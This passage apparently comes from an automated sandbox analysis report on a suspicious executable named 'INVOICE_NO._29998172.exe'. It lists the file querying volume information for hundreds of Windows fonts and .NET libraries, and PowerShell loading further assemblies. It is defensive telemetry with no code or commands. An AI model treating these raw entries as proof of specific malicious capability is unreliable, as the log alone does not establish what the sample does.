                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
